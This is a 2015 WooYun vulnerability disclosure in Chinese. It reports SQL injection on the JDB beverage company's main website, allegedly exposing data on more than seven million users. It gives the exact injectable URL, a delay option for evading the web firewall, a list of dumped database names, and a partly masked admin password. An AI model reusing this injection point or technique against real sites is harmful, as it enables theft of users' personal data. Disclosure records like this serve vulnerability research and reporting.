当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119700

漏洞标题:加多宝主站存在SQL注入漏洞可垮裤(涉及700多w用户信息及手机号)

相关厂商:加多宝

漏洞作者: 蛋清

提交时间:2015-06-11 11:23

修复时间:2015-07-26 11:24

公开时间:2015-07-26 11:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

为什么要日?因为爱啊~~最近团队天天喝加多宝,喝到破产,不知道能不能换几箱加多宝,,, ^_^

详细说明:

注入点:
http://www.jdb.cn/2013/grzx/UploadHeadPortrait.aspx?id=42ab6690-de46-4f09-b468-f9108ebd030c
--delay 2 规定两个数据包发送的延时(绕过waf)

漏洞证明:

[*] jiaduobao2013
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tmp2013
[*] tmp20131
[*] VTime
[*] wljnew
[*] wljnew2013
[*] wljtest

jdb.jpg


admin na*****3

修复方案:

1.后台藏起来
2.数据库权限控制
3.管理员密码尽量复杂。cmd5一下就出来了
你们比我们更专业~
为什么要日?因为爱啊~~最近团队天天喝加多宝,喝到破产,不知道能不能换几箱加多宝,,, ^_^
PS:之前好像被日过了。你们自己清查一下吧。

版权声明:转载请注明来源 蛋清@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝